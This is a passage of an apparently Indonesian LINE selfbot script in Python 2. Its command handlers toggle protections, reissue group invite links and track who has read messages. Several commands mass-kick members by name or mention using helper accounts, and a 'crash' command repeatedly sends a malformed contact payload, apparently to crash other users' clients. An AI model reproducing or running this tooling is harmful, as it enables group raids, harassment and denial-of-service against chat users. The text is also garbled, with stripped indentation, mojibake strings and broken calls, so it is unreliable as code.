else:md+="[Mask] COMMENT : [❌]\n"
if wait["likeOn"] == True: md+="[Mask] AUTOLIKE : [✅]\n"
else:md+="[Mask] AUTOLIKE : [❌]\n"
if wait["QrProtect"] == True: md+="[Mask] PROTECT QR : [✅]\n"
else:md+="[Mask] PROTECT QR : [❌]\n"
if wait["MProtection"] == True:md+="[Mask] PROTECT MEMBER : [✅]\n"
else:md+="[Mask] PROTECT MEMBER : [❌]\n"
if wait["Protectguest"] == True:md+="[Mask] PROTECT GUEST : [✅]\n"
else:md+="[Mask] PROTECT GUEST : [❌]\n"
if wait["Protectcancel"] == True:md+="[Mask] PROTECT CANCEL : [✅]\n"
else:md+="[Mask] PROTECT CANCEL : [❌]\n"
if wait["autoKick"] == True:md+="[Mask] PROTECT KICK : [✅]\n"
else:md+="[Mask] PROTECT KICK : [❌]\n"
if wait["Wc"] == True: md+="[Mask] WELCOME : [✅]\n"
else:md+="[Mask] WELCOME : [❌]\n"
if wait["Lv"] == True: md+="[Mask] LEAVE : [✅]\n"
else:md+="[Mask] LEAVE : [❌]\n"
if wait["tag"] == True: md+="[Mask] TAG 1 : [✅]\n"
else:md+="[Mask] TAG 1 : [❌]\n"
if wait["tag2"] == True: md+="[Mask] TAG 2 : [✅]\n"
else:md+="[Mask] TAG 2 : [❌]\n"
if wait["auto"] == True: md+="[Mask] AutoBot Join : [✅]\n"
else:md+="[Mask] AutoBot Join : [❌]\n"
cl.sendText(msg.to,md)
#--------------------------------------------------
elif "album merit " in msg.text:
if msg.from_ in admin or owner:
gid = msg.text.replace("album merit ","")
album = cl.getAlbum(gid)
if album["result"]["items"] == []:
if wait["lang"] == "JP":
cl.sendText(msg.to,"There is no album")
else:
cl.sendText(msg.to,"相åâ�1�7�1�71¤7 Œæ²¡åÅ�1�7�¨ãâ�1�7�¬â€ 1�71¤7")
else:
if wait["lang"] == "JP":
mg = "The following is the target album"
else:
mg = "以下是对象çšâ�1�7�1�71¤7žÃ§â 1�71¤7ºÂ¸Ã¥â 1�71¤7 Å 1�71¤7"
for y in album["result"]["items"]:
if "photoCount" in y:
mg += str(y["title"]) + ":" + str(y["photoCount"]) + "sheet\n"
else:
mg += str(y["title"]) + ":0sheet\n"
cl.sendText(msg.to,mg)
#--------------------------------------------------
elif "album " in msg.text:
if msg.from_ in admin or owner:
gid = msg.text.replace("album ","")
album = cl.getAlbum(gid)
if album["result"]["items"] == []:
if wait["lang"] == "JP":
cl.sendText(msg.to,"There is no album")
else:
cl.sendText(msg.to,"相åâ�1�7�1�71¤7 Œæ²¡åÅ�1�7�¨ãâ�1�7�¬â€ 1�71¤7")
else:
if wait["lang"] == "JP":
mg = "The following is the target album"
else:
mg = "以下是对象çšâ�1�7�1�71¤7žÃ§â 1�71¤7ºÂ¸Ã¥â 1�71¤7 Å 1�71¤7"
for y in album["result"]["items"]:
if "photoCount" in y:
mg += str(y["title"]) + ":" + str(y["photoCount"]) + "sheet\n"
else:
mg += str(y["title"]) + ":0sheet\n"
#--------------------------------------------------
elif "album remove " in msg.text:
if msg.from_ in admin or owner:
gid = msg.text.replace("album remove ","")
albums = cl.getAlbum(gid)["result"]["items"]
i = 0
if albums != []:
for album in albums:
cl.deleteAlbum(gid,album["id"])
i += 1
if wait["lang"] == "JP":
cl.sendText(msg.to,str(i) + "Deleted albums")
else:
cl.sendText(msg.to,str(i) + "Ã¥Ë 1�7 除äºâ�1�7�1�71¤7 äºâ 1�71¤7¹Ã§Å¡â 1�71¤7žÃ§â 1�71¤7ºÂ¸Ã¥â 1�71¤7 ΋â�1�7�¬â€ 1�71¤7")
elif msg.text in ["Group id","群組åâ�1�7�1�71¤7¦Â¨id"]:
if msg.from_ in admin or owner:
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "[%s]:%s\n" % (cl.getGroup(i).name,i)
cl.sendText(msg.to,h)
#--------------------------------------------------
elif msg.text in ["Clear"]:
if msg.from_ in admin or owner:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"All invitations have been refused")
else:
cl.sendText(msg.to,"æ‹â�1�7�1�71¤7™Ã§Â»Âäºâ�1�7�1�71¤7 Ã¥â 1�71¤7¦Â¨Ã©Æ’¨çšâ�1�7�1�71¤7žÃ©â 1�71¤7šâ‚¬Ã¨Â¯Â·Ã£â�1�7�¬â�1�7�1�71¤7 1�71¤7")
#--------------------------------------------------
elif "album removeâ†â�1�7�1�71¤7 1�71¤7" in msg.text:
if msg.from_ in admin or owner:
gid = msg.text.replace("album removeâ†â�1�7�1�71¤7 1�71¤7","")
albums = cl.getAlbum(gid)["result"]["items"]
i = 0
if albums != []:
for album in albums:
cl.deleteAlbum(gid,album["id"])
i += 1
if wait["lang"] == "JP":
cl.sendText(msg.to,str(i) + "Albums deleted")
else:
cl.sendText(msg.to,str(i) + "Ã¥Ë 1�7 除äºâ�1�7�1�71¤7 äºâ 1�71¤7¹Ã§Å¡â 1�71¤7žÃ§â 1�71¤7ºÂ¸Ã¥â 1�71¤7 ΋â�1�7�¬â€ 1�71¤7")
#--------------------------------------------------
elif msg.text in ["自åâ�1�7�1�71¤7¹â 1�71¤7¢Ã¨Â¿Â½Ã¥Å 1�71¤7 :オãÆ�1�7�Â�1�7�1�71¤7","Add on","Auto add:on","自åâ�1�7�1�71¤7¹â 1�71¤7¢Ã¨Â¿Â½Ã¥Å 1�71¤7 :éâ€�1�7�â�1�7�1�71¤7 1�71¤7"]:
if msg.from_ in admin or owner:
if wait["autoAdd"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["autoAdd"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦Â了å¼â�1�7�¬Ã£â�1�7�¬â�1�7�1�71¤7 1�71¤7")
#--------------------------------------------------
elif msg.text in ["自åâ�1�7�1�71¤7¹â 1�71¤7¢Ã¨Â¿Â½Ã¥Å 1�71¤7 :オãÆ�1�7�â�1�7�1�71¤7 1�71¤7","Add off","Auto add:off","自åâ�1�7�1�71¤7¹â 1�71¤7¢Ã¨Â¿Â½Ã¥Å 1�71¤7 :éâ€�1�7�Å�1�7�1�71¤7"]:
if msg.from_ in admin or owner:
if wait["autoAdd"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["autoAdd"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦Â了åâ�1�7�1�71¤7¦Â³Ã¦â 1�71¤7“Âãâ�1�7�¬â€ 1�71¤7")
#--------------------------------------------------
elif "Message change: " in msg.text:
if msg.from_ in admin or owner:
wait["message"] = msg.text.replace("Message change: ","")
cl.sendText(msg.to,"message changed")
elif "Message add: " in msg.text:
if msg.from_ in admin or owner:
wait["message"] = msg.text.replace("Message add: ","")
if wait["lang"] == "JP":
cl.sendText(msg.to,"message changed")
else:
cl.sendText(msg.to,"doneã€â�1�7�1�71¤7 1�71¤7")
#--------------------------------------------------
elif msg.text in ["Message","自åâ�1�7�1�71¤7¹â 1�71¤7¢Ã¨Â¿Â½Ã¥Å 1�71¤7 å•ÂÃ¥â�1�7�¬â�1�7�¢Ã¨ÂªÅ¾Ã§Â¢ÂºÃ¨ÂªÂ�1�7�1�71¤7"]:
if msg.from_ in admin or owner:
if wait["lang"] == "JP":
cl.sendText(msg.to,"message change to\n\n" + wait["message"])
else:
cl.sendText(msg.to,"The automatic appending information is set as followsã€â�1�7�1�71¤7š\n\n" + wait["message"])
#--------------------------------------------------
elif "Comment:" in msg.text:
if msg.from_ in admin or owner:
c = msg.text.replace("Comment:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"message changed")
else:
wait["comment"] = c
cl.sendText(msg.to,"changed\n\n" + c)
#--------------------------------------------------
elif "Add comment:" in msg.text:
if msg.from_ in admin or owner:
c = msg.text.replace("Add comment:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"String that can not be changed")
else:
wait["comment"] = c
cl.sendText(msg.to,"changed\n\n" + c)
elif msg.text in ["コãÆ�1�7�¡ãÆ�1�7�³ãÆ�1�7�Ë�1�7�1�71¤7:オãÆ�1�7�Â�1�7�1�71¤7","Comment on","Comment:on","自åâ�1�7�1�71¤7¹â 1�71¤7¢Ã©Â¦â 1�71¤7“Ã�1�7�1�71¤7 Âç•â�1�7�¢Ã¨Â¨â�1�7�¬Ã¯Â¼Å¡Ã©â�1�7�1�71¤7“â�1�7�1�71¤7 1�71¤7"]:
if msg.from_ in admin or owner:
if wait["commentOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already on")
else:
wait["commentOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦Â了å¼â�1�7�¬Ã£â�1�7�¬â�1�7�1�71¤7 1�71¤7")
elif msg.text in ["コãÆ�1�7�¡ãÆ�1�7�³ãÆ�1�7�Ë�1�7�1�71¤7:オãÆ�1�7�â�1�7�1�71¤7 1�71¤7","Comment on","Comment off","自åâ�1�7�1�71¤7¹â 1�71¤7¢Ã©Â¦â 1�71¤7“Ã�1�7�1�71¤7 Âç•â�1�7�¢Ã¨Â¨â�1�7�¬Ã¯Â¼Å¡Ã©â�1�7�1�71¤7”Å�1�7�1�71¤7"]:
if msg.from_ in admin or owner:
if wait["commentOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already off")
else:
wait["commentOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦Â了åâ�1�7�1�71¤7¦Â³Ã¦â 1�71¤7“Âãâ�1�7�¬â€ 1�71¤7")
elif msg.text in ["Comment","ç•â�1�7�¢Ã¨Â¨â�1�7�¬Ã§Â¢ÂºÃ¨ÂªÂ�1�7�1�71¤7"]:
if msg.from_ in admin or owner:
cl.sendText(msg.to,"message changed to\n\n" + str(wait["comment"]))
elif msg.text in ["Gurl"]:
if msg.from_ in admin or owner:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
cl.updateGroup(x)
gurl = cl.reissueGroupTicket(msg.to)
cl.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Kr1 gurl"]:
if msg.from_ in admin or owner:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
ki.updateGroup(x)
gurl = ki.reissueGroupTicket(msg.to)
cl.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Kr2 gurl"]:
if msg.from_ in admin or owner:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
kk.updateGroup(x)
gurl = kk.reissueGroupTicket(msg.to)
cl.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Kr3 gurl"]:
if msg.from_ in admin or owner:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
kc.updateGroup(x)
gurl = kc.reissueGroupTicket(msg.to)
kc.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Comment bl "]:
if msg.from_ in admin or owner:
wait["wblack"] = True
cl.sendText(msg.to,"add to comment bl")
elif msg.text in ["Comment wl "]:
if msg.from_ in admin or owner:
wait["dblack"] = True
cl.sendText(msg.to,"wl to comment bl")
elif msg.text in ["Comment bl confirm"]:
if msg.from_ in admin or owner:
if wait["commentBlack"] == {}:
cl.sendText(msg.to,"confirmed")
else:
cl.sendText(msg.to,"Blacklist")
mc = ""
for mi_d in wait["commentBlack"]:
mc += "" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif msg.text in ["Jam on"]:
if msg.from_ in admin or owner:
if wait["clock"] == True:
cl.sendText(msg.to,"already on")
else:
wait["clock"] = True
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
cl.sendText(msg.to,"done")
elif msg.text in ["Jam off"]:
if msg.from_ in admin or owner:
if wait["clock"] == False:
cl.sendText(msg.to,"already off")
else:
wait["clock"] = False
cl.sendText(msg.to,"done")
elif msg.text in ["Change clock "]:
if msg.from_ in admin or owner:
n = msg.text.replace("Change clock ","")
if len(n.decode("utf-8")) > 13:
cl.sendText(msg.to,"changed")
else:
wait["cName"] = n
cl.sendText(msg.to,"changed to\n\n" + n)
elif msg.text in ["Up"]:
if msg.from_ in admin or owner:
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
cl.sendText(msg.to,"Updated")
else:
cl.sendText(msg.to,"Please turn on the name clock")
elif msg.text == "CCtv":
cl.sendText(msg.to, "Check sider Eror"),
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['ROM'][msg.to] = {}
print wait2
elif msg.text == "Toong":
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
chiya = ""
else:
chiya = ""
for rom in wait2["ROM"][msg.to].items():
print rom
chiya += rom[1] + "\n"
cl.sendText(msg.to, "People who readed %s\nthat's it\n\nPeople who have ignored reads\n%sIt is abnormal \n\nReading point creation date n time:\n[%s]" % (wait2['readMember'][msg.to],chiya,setTime[msg.to]))
else:
cl.sendText(msg.to, "An already read point has not been set.\n¡¸Cctv¡¹you can send read point will be created ")
#-----------------------------------------------
elif msg.text in ["Crot"]:
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
nm1, nm2, nm3, nm4, jml = [], [], [], [], len(nama)
if jml <= 100:
mention(msg.to, nama)
if jml > 100 and jml < 200:
for i in range (0, 99):
nm1 += [nama[i]]
mention(msg.to, nm1)
for j in range (100, len(nama)-1):
nm2 += [nama[j]]
mention(msg.to, nm2)
if jml > 200 and jml < 300:
for i in range (0, 99):
nm1 += [nama[i]]
mention(msg.to, nm1)
for j in range (100, 199):
nm2 += [nama[j]]
mention(msg.to, nm2)
for k in range (200, len(nama)-1):
nm3 += [nama[k]]
mention(msg.to, nm3)
if jml > 300 and jml < 400:
for i in range (0, 99):
nm1 += [nama[i]]
mention(msg.to, nm1)
for j in range (100, 199):
nm2 += [nama[j]]
mention(msg.to, nm2)
for k in range (200, 299):
nm3 += [nama[k]]
mention(msg.to, nm3)
for l in range (300, len(nama)-1):
nm4 += [nama[l]]
mention(msg.to, nm4)
cnt = Message()
cnt.text = "Hasil Tag : "+str(jml)
cnt.to = msg.to
cl.sendText(msg.to,"TAGALL SUCCESS")
cl.sendMessage(cnt)
#-----------------------------------------------
elif msg.text in ["Kr"]:
if msg.from_ in admin or owner:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
kk.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
kc.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki.updateGroup(G)
elif msg.text in ["Kr1 join"]:
if msg.from_ in admin or owner:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
cl.updateGroup(X)
invsend = 0
Ti = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ti)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki.updateGroup(G)
Ticket = kk.reissueGroupTicket(msg.to)
elif msg.text in ["Kr2 join"]:
if msg.from_ in admin or owner:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
cl.updateGroup(X)
invsend = 0
Ti = cl.reissueGroupTicket(msg.to)
kk.acceptGroupInvitationByTicket(msg.to,Ti)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
kk.updateGroup(G)
Ticket = kk.reissueGroupTicket(msg.to)
#-----------------------------------------------
#.acceptGroupInvitationByTicket(msg.to,Ticket)
elif msg.text in ["Kr3 join"]:
if msg.from_ in admin or owner:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
kc.acceptGroupInvitationByTicket(msg.to,Ticket)
print "kicker ok"
G.preventJoinByTicket = True
kc.updateGroup(G)
#-----------------------------------------------
elif msg.text in ["Out","out"]:
if msg.from_ in admin or owner:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
cl.leaveGroup(msg.to)
kk.leaveGroup(msg.to)
kc.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Ranita pergi"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
cl.sendText(msg.to,"Bye~Bye " + str(ginfo.name) + "\n\nJangan Lupa Bahagia...!!!")
cl.leaveGroup(msg.to)
ki.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Ranita bye"]:
if msg.from_ in admin or owner:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
cl.sendText(msg.to,"Bye~Bye " + str(ginfo.name) + "\n\nJangan Lupa Bahagia...!!!")
cl.leaveGroup(msg.to)
ki.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Kr pergi"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
cl.sendText(msg.to,"Bye~Bye " + str(ginfo.name) + "\n\nJangan Lupa Bahagia...!!!")
cl.leaveGroup(msg.to)
ki.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif msg.text in ["Kill"]:
if msg.from_ in admin or owner:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
cl.sendText(msg.to,"Fuck You")
cl.sendText(msg.to,"Fuck You")
return
for jj in matched_list:
try:
klist=[cl]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[jj])
print (msg.to,[jj])
except:
print
elif "Glist" in msg.text:
if msg.from_ in owner:
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "☄ %s \n" % (cl.getGroup(i).name + " 👥 ▄ [ " + str(len (cl.getGroup(i).members))+" ]")
cl.sendText(msg.to, " ☄ [ ♡List Grup♄ ] ☜\n"+ h +"Total Group ▄" +"[ "+str(len(gid))+" ]")
elif "Cium " in msg.text:
if msg.from_ in admin or owner or mid:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"] [0] ["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
except:
cl.sendText(msg.to,"Error")
elif "Ready ah" in msg.text:
if msg.from_ in owner:
if msg.toType == 2:
print "ok"
_name = msg.text.replace("Ready ah","")
gs = cl.getGroup(msg.to)
cl.sendText(msg.to,"Perintah DiLaksanakan Maaf Kan Saya :v ô")
cl.sendText(msg.to,"Group DiBersihkan.")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found.")
cl.sendText(msg.to,"Not found.")
else:
for target in targets:
try:
klist=[cl]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
cl.sendText(msg.to,"Group cleanse")
cl.sendText(msg.to,"Group cleanse")
elif msg.text in ["Salam1"]:
cl.sendText(msg.to,"السَّلاَمُ عَلَيْكُمْ وَرَحْمَةُ اللهِ وَبَرَكَاتُهُ")
cl.sendText(msg.to,"Assalamu'alaikum")
elif msg.text in ["Salam2"]:
cl.sendText(msg.to,"وَعَلَيْكُمْ السَّلاَمُرَحْمَةُ اللهِ وَبَرَكَاتُهُ")
cl.sendText(msg.to,"Wa'alaikumsallam.Wr,Wb")
elif "Salam3" in msg.text:
if msg.from_ in owner:
cl.sendText(msg.to,"السَّلاَمُ عَلَيْكُمْ وَرَحْمَةُ اللهِ وَبَرَكَاتُهُ")
cl.sendText(msg.to,"Assalamu'alaikum")
cl.sendText(msg.to,"وَعَلَيْكُمْ السَّلاَمُ وَرَحْمَةُ اللهِوَبَرَكَاتُهُ")
cl.sendText(msg.to,"Wa'alaikumsallam.Wr,Wb")
if msg.toType == 2:
print "ok"
_name = msg.text.replace("Salam3","")
gs = cl.getGroup(msg.to)
cl.sendText(msg.to,"maaf kalo gak sopan")
cl.sendText(msg.to,"Qo salamnya gak ada yang jawab ya..!!")
cl.sendText(msg.to,"hehehhehe")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found")
else:
for target in targets:
if target not in Bots:
try:
klist=[cl]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
cl.sendText(msg.to,"السَّلاَمُ عَلَيْكُمْ وَرَحْمَةُ اللهِ وَبَرَكَاتُهُ")
cl.sendText(msg.to,"وَعَلَيْكُمْ السَّلاَمُ وَرَحْمَةُ اللهِوَبَرَكَاتُهُ")
cl.sendText(msg.to,"Nah salamnya jawab sendiri dah")
elif "Nk " in msg.text:
if msg.from_ in owner:
nk0 = msg.text.replace("Nk ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
cl.sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
klist=[cl]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
cl.sendText(msg.to,"Succes Kick")
cl.sendText(msg.to,"Fuck You"),
elif "Ndang " in msg.text:
if msg.from_ in owner:
nk0 = msg.text.replace("Ndang ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
gs.preventJoinByTicket = False
cl.updateGroup(gs)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
satpam.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
satpam.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
satpam.leaveGroup(msg.to)
gs = cl.getGroup(msg.to)
gs.preventJoinByTicket = True
cl.updateGroup(gs)
gs.preventJoinByTicket(gs)
cl.updateGroup(gs)
elif "Blacklist @ " in msg.text:
if msg.from_ in admin or owner:
_name = msg.text.replace("Blacklist @ ","")
_kicktarget = _name.rstrip(' ')
gs = ki2.getGroup(msg.to)
targets = []
for g in gs.members:
if _kicktarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found")
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
k3.sendText(msg.to,"Succes Van")
except:
cl.sendText(msg.to,"error")
elif "Ban @" in msg.text:
if msg.from_ in admin or owner:
if msg.toType == 2:
print "[Ban]ok"
_name = msg.text.replace("Ban @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Tidak DiTemukan")
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Berhasil Memban")
except:
cl.sendText(msg.to,"Error")
elif "Unban @" in msg.text:
if msg.from_ in admin or owner:
if msg.toType == 2:
print "[Unban]ok"
_name = msg.text.replace("Unban @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = cl.getGroup(msg.to)
gs = kc.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Tidak DiTemukan")
cl.sendText(msg.to,"Tidak DiTemukan")
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Berhasil")
except:
cl.sendText(msg.to,"Berhasil")
#-----------------------------------------------
elif msg.text == "Cctv":
cl.sendText(msg.to, "Lurking Is Starting!! "+ datetime.today().strftime('%H:%M:%S'))
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
now2 = datetime.now()
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['ROM'][msg.to] = {}
wait2['setTime'][msg.to] = datetime.today().strftime('%Y-%m-%d %H:%M:%S')
print wait2
elif msg.text in ["Intip"]:
if msg.toType == 2:
print "\nRead aktif..."
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
chiya = ""
else:
chiya = ""
for rom in wait2["ROM"][msg.to].items():
print rom
chiya += rom[1] + "\n"
cl.sendText(msg.to, "Sider :\n =========================== %s\n===========================\n\nReader :\n%s\n===========================\nIn the last seen point:\n[%s]\n===========================" % (wait2['readMember'][msg.to],chiya,setTime[msg.to]))
print "\nReading Point Set..."
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.today().strftime('%Y-%m-%d %H:%M:%S')
wait2['ROM'][msg.to] = {}
print "lukers"
cl.sendText(msg.to, "Auto Read Point!!" + (wait2['setTime'][msg.to]))
else:
cl.sendText(msg.to, "Ketik [Lurking] for [Lurkers]")
#-------------------------------------
elif "Cn " in msg.text:
if msg.from_ in admin or owner:
string = msg.text.replace("Cn ","")
if len(string.decode('utf-8')) <= 500:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendText(msg.to,"UpdateName => " + string + " <= Success")
#----------------------------
elif "Vk " in msg.text:
if msg.from_ in admin or owner:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
except:
pass
#-----------------------------------------------
elif msg.text.lower() == 'crash':
if msg.from_ in owner:
msg.contentType = 13
msg.contentMetadata = {'mid': "ua7fb5762d5066629323d113e1266e8ca',"}
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
#-----------------------------------------------
elif msg.text in ["Tes"]:
if msg.from_ in admin or owner:
cl.sendText(msg.to,"Kr Hadir Boss!!")
#-----------------------------------------------
elif msg.text in ["Mode On","mode on"]:
if msg.from_ in admin or owner:
if wait["QrProtect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR On")
else:
cl.sendText(msg.to,"done")
else:
wait["QrProtect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR On")
else:
cl.sendText(msg.to,"done")
if wait["MProtection"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Member Protection On")
else:
cl.sendText(msg.to,"done")
else:
wait["MProtection"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Member Protection On")
else:
cl.sendText(msg.to,"done")
if msg.to in wait['pname']:
cl.sendText(msg.to,"TURN ON")
else:
cl.sendText(msg.to,"ALREADY ON")
wait['pname'][msg.to] = True
wait['pro_name'][msg.to] = cl.getGroup(msg.to).name
if wait["Protectcancel"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"proтecт cancel on")
else:
wait["Protectcancel"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
if wait["Wc"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"noтιғ joιn on")
else:
wait["Wc"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
if wait["Lv"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"noтιғ leave on")
else:
wait["Lv"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
if wait["autoKick"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Kick on")
else:
wait["autoKick"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
if wait["tag"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on")
else:
cl.sendText(msg.to,"Tag On")
else:
wait["tag"] = True
if wait["lang"] == "JP":
